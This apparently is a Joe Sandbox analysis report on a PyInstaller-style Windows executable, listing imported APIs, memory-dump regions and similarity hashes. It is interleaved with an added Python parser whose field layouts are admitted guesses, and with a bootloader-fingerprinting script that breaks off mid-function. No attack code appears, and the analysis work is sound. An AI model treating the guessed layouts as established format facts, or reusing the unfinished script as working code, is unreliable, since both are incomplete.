• Instruction ID: 9ee7cf53e83f83ff636c49a0e447475e1a33ff4bcac3591da54af4149936f7ac
• Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
• Instruction Fuzzy Hash: 0C119171718A8181DE618B29EC5416A6371BB85BF4F544331EE7D8B7E9CE7CD0518701
APIs
• RtlFreeHeap.NTDLL(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9CE
• GetLastError.KERNEL32(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9D8
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
• Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                              • Instruction ID: 88a097576592780916cce2bdbbfb4a633a96d504a379eecfbb912931ba418a9a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8E0CD60F0C60392FF16DBFA9C6553A11706FD8BB0F044234C81DC22A2EE3C6895C312
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00007FF62CC8AA45,?,?,00000000,00007FF62CC8AAFA), ref: 00007FF62CC8AC36
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF62CC8AA45,?,?,00000000,00007FF62CC8AAFA), ref: 00007FF62CC8AC40
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 918212764-0
                                                                                                                                                                                                                              • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                              • Instruction ID: 71713c5413e71548ff9e783cc55ef8f4c1438063c4e8d6133f2a6256f75af0f7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A219321F1C64242FEA657699C9067B12B29F84BF4F484339EA2EC77C5CE6CE4458302
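The per-function records above (APIs, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity) are the raw material an analyst usually wants in a queryable form: which imports each function calls, where in the image the call sites sit, and whether the similarity fields are internally consistent. The following is an added example, not Joe Sandbox code and not part of this report; it parses records in the layout shown on this page. Assumptions, stated in the code as well: the dotted .sdmp file name is read as pid.dump_no.timestamp.base.protect.?.type.? with base, protect and type in hex (the values in this report, 0x20/0x02/0x04 and 0x1000000, line up with the Win32 PAGE_EXECUTE_READ/PAGE_READONLY/PAGE_READWRITE and MEM_IMAGE constants, which is the only basis for that reading); region sizes are not listed, so a call site is assigned to the highest listed base at or below it; and the `expected_api_id` heuristic merely reproduces the "API ID" strings seen in these records and is not a documented Joe Sandbox algorithm. The function names and the embedded sample text are constructed for the example.

```python
"""Parse Joe Sandbox per-function records (APIs, dump source, similarity IDs).

Added example, not Joe Sandbox code. ASSUMPTION: the dotted .sdmp name is
pid.dump_no.timestamp.base.protect.?.type.? (hex fields); 0x20/0x02/0x04 match
Win32 PAGE_* constants and 0x1000000 matches MEM_IMAGE, hence that reading.
"""
import re
from dataclasses import dataclass, field

PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

API_RE = re.compile(r"^• (\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^• ([^:]+):\s*(.*)$")
SDMP_RE = re.compile(r"([0-9A-Fa-f]+(?:\.[0-9A-Fa-f]+){7})\.sdmp")
OFFSET_RE = re.compile(r"Offset: ([0-9A-Fa-f]+)")

@dataclass
class Region:
    pid: int
    base: int
    protect: str
    mem_type: str

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)     # (api, module, absolute ref address)
    regions: list = field(default_factory=list)  # from Source File / Associated lines
    image_base: int = 0                          # "Offset:" on the Source File line
    meta: dict = field(default_factory=dict)     # API ID, Opcode ID, fuzzy hashes, ...

def parse_sdmp_name(name: str) -> Region:
    f = name.split(".")  # assumed field layout, see module docstring
    prot, typ = int(f[4], 16), int(f[6], 16)
    return Region(int(f[0], 16), int(f[3], 16),
                  PAGE_PROTECT.get(prot, hex(prot)), MEM_TYPE.get(typ, hex(typ)))

def parse_records(text: str) -> list:
    """Split the report text on 'APIs' headings and parse each record's bullet lines."""
    records, rec = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            rec = FunctionRecord()
            records.append(rec)
            continue
        if rec is None or not line.startswith("•"):
            continue
        m = API_RE.match(line)
        if m:
            rec.apis.append((m.group(1), m.group(2), int(m.group(4), 16)))
            continue
        m = KV_RE.match(line)
        if not m:
            continue
        key, val = m.group(1), m.group(2)
        if key in ("Source File", "Associated"):
            s, o = SDMP_RE.search(val), OFFSET_RE.search(val)
            if s:
                rec.regions.append(parse_sdmp_name(s.group(1)))
            if o:
                rec.image_base = int(o.group(1), 16)
        else:
            rec.meta[key] = val
    return records

def region_of(rec: FunctionRecord, addr: int):
    """Region sizes are not in the report: take the highest listed base <= addr."""
    cands = [r for r in rec.regions if r.base <= addr]
    return max(cands, key=lambda r: r.base) if cands else None

def expected_api_id(rec: FunctionRecord):
    """Reproduces the 'API ID' of the records on this page: CamelCase words of the
    called APIs with 'Get' dropped, de-duplicated and sorted. An observation about
    these records, not a documented Joe Sandbox algorithm."""
    if not rec.apis:
        return None
    words = set()
    for api, _, _ in rec.apis:
        words.update(w for w in re.findall(r"[A-Z][a-z0-9]*", api) if w != "Get")
    return "".join(sorted(words))

def summarize(rec: FunctionRecord) -> dict:
    calls = []
    for api, _module, addr in rec.apis:
        reg = region_of(rec, addr)
        calls.append((api, f"0x{addr - rec.image_base:X}", reg.protect if reg else "?"))
    return {
        "api_id": rec.meta.get("API ID"),
        "api_id_matches": (expected_api_id(rec) == rec.meta.get("API ID")) if rec.apis else None,
        "opcode_id_is_fuzzy_hash": rec.meta.get("Opcode ID") == rec.meta.get("Opcode Fuzzy Hash"),
        "calls": calls,  # (api, RVA, protection of the containing region)
    }

# Constructed sample: two records copied from this report, link text removed.
SAMPLE = """\
APIs
• CloseHandle.KERNEL32(?,?,?,00007FF62CC8AA45,?,?,00000000,00007FF62CC8AAFA), ref: 00007FF62CC8AC36
• GetLastError.KERNEL32(?,?,?,00007FF62CC8AA45,?,?,00000000,00007FF62CC8AAFA), ref: 00007FF62CC8AC40
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• API String ID: 918212764-0
• Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
• Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
APIs
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
Similarity
• API ID: _invalid_parameter_noinfo
• Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
• Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
"""

if __name__ == "__main__":
    for record in parse_records(SAMPLE):
        print(summarize(record))
```

Run against the sample, the CloseHandle record resolves to RVA 0x1AC36 inside the PAGE_EXECUTE_READ region at 0x7FF62CC71000 of the MEM_IMAGE mapping, its API ID is reproduced by the heuristic, and both records report Opcode ID equal to Opcode Fuzzy Hash. Records whose API ID is a CRT internal such as _invalid_parameter_noinfo carry no import lines, so the heuristic returns None for them rather than a false mismatch.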

APIs
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
• Instruction ID: ef09d287a09e8cd73fc19644dbf20ae15d5b4352a4f4c756acca0183ea213856
• Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
• Instruction Fuzzy Hash: 0541B132B0960187EE359A1DED50A7B73B4EB55BE4F105231DA8EC7691CF2DE402CB52

APIs
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: _fread_nolock
• String ID:
• API String ID: 840049012-0
• Opcode ID: 8b238289baf9dddcba6bfc48a855cad56bb9a0da69048aaa23f75c3b13f56717
• Instruction ID: 0039720059a151118b1f507c689274f688197bc56855f4e79e3fe9b4d6c86197
• Opcode Fuzzy Hash: 8b238289baf9dddcba6bfc48a855cad56bb9a0da69048aaa23f75c3b13f56717
• Instruction Fuzzy Hash: 6C21D321B0C65285FE119B2A6D087BA9665FF45BE8F8C4430EF0D9B786DE3DE046D702

APIs
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
• Instruction ID: 97f1d0c4fecc28903f4903597c344abfd029484504783e5bb07065959d23f5a6
• Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
• Instruction Fuzzy Hash: 7F317E31B1864285EB539B598C61BBE2670AF40BF4F420339E96D933D2DF7CA4818722

APIs
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
• Instruction ID: 5288570d1ffbc8e2ef83e37d5cf275736ad5d9772271ffb1c41ff4d437e66771
• Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
• Instruction Fuzzy Hash: 75119632B1C64181FE629F599C0197FA2B1AF45BE0F444231EB4CD7A96DFBDD4008702

APIs
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                              • Instruction ID: 546a1a177f04ca54416a5c650dd3ac28fe9a4316dc461935a5df6a72e6a73d96
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB215072718A8286DFA19F1CD85077A76B0FB84BA8F548234E69DC76D9DF3CD4008B01
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
• Part of subcall function 00007FF62CC79400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF62CC745E4,00000000,00007FF62CC71985), ref: 00007FF62CC79439
• LoadLibraryExW.KERNEL32(?,00007FF62CC76466,?,00007FF62CC7336E), ref: 00007FF62CC79092
Similarity
• API ID: ByteCharLibraryLoadMultiWide
• String ID:
• API String ID: 2592636585-0
APIs
• HeapAlloc.KERNEL32(?,?,00000000,00007FF62CC8B39A,?,?,?,00007FF62CC84F81,?,?,?,?,00007FF62CC8A4FA), ref: 00007FF62CC8EC5D
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
APIs
• HeapAlloc.KERNEL32(?,?,?,00007FF62CC80D00,?,?,?,00007FF62CC8236A,?,?,?,?,?,00007FF62CC83B59), ref: 00007FF62CC8D6AA
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
APIs
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
APIs
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2227656907-0
                                                                                                                                                                                                                              • Opcode ID: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
                                                                                                                                                                                                                              • Instruction ID: 9fd4ae548ac1ef3df7c51d4114e7dfce83ccbd1a0ccab4bef7e6d245794e04f3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1B1D662B1C69241EE619B2ADC015BA63B1EB45BF8F448131EE5D87BD5EF3CE441C302
APIs
• _get_daylight.LIBCMT ref: 00007FF62CC95F1A
  • Part of subcall function 00007FF62CC95668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62CC9567C
• _get_daylight.LIBCMT ref: 00007FF62CC95F2B
  • Part of subcall function 00007FF62CC95608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62CC9561C
• _get_daylight.LIBCMT ref: 00007FF62CC95F3C
  • Part of subcall function 00007FF62CC95638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62CC9564C
  • Part of subcall function 00007FF62CC8A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9CE
  • Part of subcall function 00007FF62CC8A9B8: GetLastError.KERNEL32(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9D8
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF62CC9617C), ref: 00007FF62CC95F63
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 3458911817-0
• Opcode ID: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
• Instruction ID: 487cc8da38f35d392e169b1bd9d713813a4fca92cb90ad373c67ccca4ad9a43b
• Opcode Fuzzy Hash: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
• Instruction Fuzzy Hash: 6351A272B0864296EB20EF29DC815B96770FF487A8F449235EA4DC7796DF3CE4418742
APIs
• GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC75830
• GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC75842
• GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC75879
• GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC7588B
• GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC758A4
• GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC758B6
• GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC758CF
• GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC758E1
• GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC758FD
• GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC7590F
• GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC7592B
• GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC7593D
• GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC75959
• GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC7596B
• GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC75987
• GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC75999
• GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC759B5
• GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC759C7
Strings
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
• API String ID: 199729137-653951865
• Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
• Instruction ID: ed7a3963f2ba6b22fca9b8c813b45cef6a5515a54ceb7c2da60ea6be0e7f8730
• Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
• Instruction Fuzzy Hash: 9622B374B49F47D2FE159B5DAD241B423B4EF04BB9B84A035C82E86360EF3CB55AD206
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
• API String ID: 199729137-3427451314
• Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
• Instruction ID: 4736c4785d45458d7ecd6ca510b826146a83199af77a7766b131d2ddab09aa15
• Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
• Instruction Fuzzy Hash: 9702B270B0DB0BA1FE269B5DAD245B423B4BF44B79B44A031D41E862A4EF3CB559D313
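The two GetProcAddress functions above are the PyInstaller-style bootloader resolving the CPython C API and the Tcl/Tk API by name at run time, with a single "Failed to get address for %hs" error string for the failure path. Those resolved names are static, so they make a cheap triage indicator: the script below is an added example (not part of the Joe Sandbox report and not code from the sample) that pulls printable strings out of a buffer and scores them against the symbol lists listed in the String IDs above. The indicator subsets, the score thresholds, and the constructed sample buffers are this example's own assumptions; the one version inference it makes, that the PyConfig/PyPreConfig API only exists from CPython 3.8 on (PEP 587), is a documented fact.

```python
"""Triage helper: fingerprint a PyInstaller-style bootloader from the symbol
names it resolves via GetProcAddress (example code, not from the report)."""
import re

# Indicator strings copied from the String IDs of the two GetProcAddress
# entries in this report. The subsets chosen here are an assumption; any of
# the listed names would do, these are simply the least generic ones.
RESOLVER_FMT = "Failed to get address for %hs"
PY_CAPI = {
    "PyConfig_InitIsolatedConfig", "PyPreConfig_InitIsolatedConfig",
    "Py_InitializeFromConfig", "PyMarshal_ReadObjectFromString",
    "PyImport_ExecCodeModule", "PyRun_SimpleStringFlags", "PyEval_EvalCode",
}
TCL_TK = {
    "Tcl_CreateInterp", "Tcl_EvalEx", "Tcl_DoOneEvent",
    "Tk_Init", "Tk_GetNumMainWindows",
}


def ascii_strings(buf: bytes, min_len: int = 6) -> set[str]:
    """Printable-ASCII runs of at least min_len bytes, like `strings -n 6`.

    Returning a set lets the caller do exact-name matching, so a symbol such
    as Py_DecRef is not confused with a longer string that merely contains it.
    """
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return {m.group().decode("ascii") for m in re.finditer(pattern, buf)}


def fingerprint(buf: bytes) -> dict:
    """Score a PE image or memory dump against the bootloader indicators."""
    found = ascii_strings(buf)
    py_hits = sorted(PY_CAPI & found)
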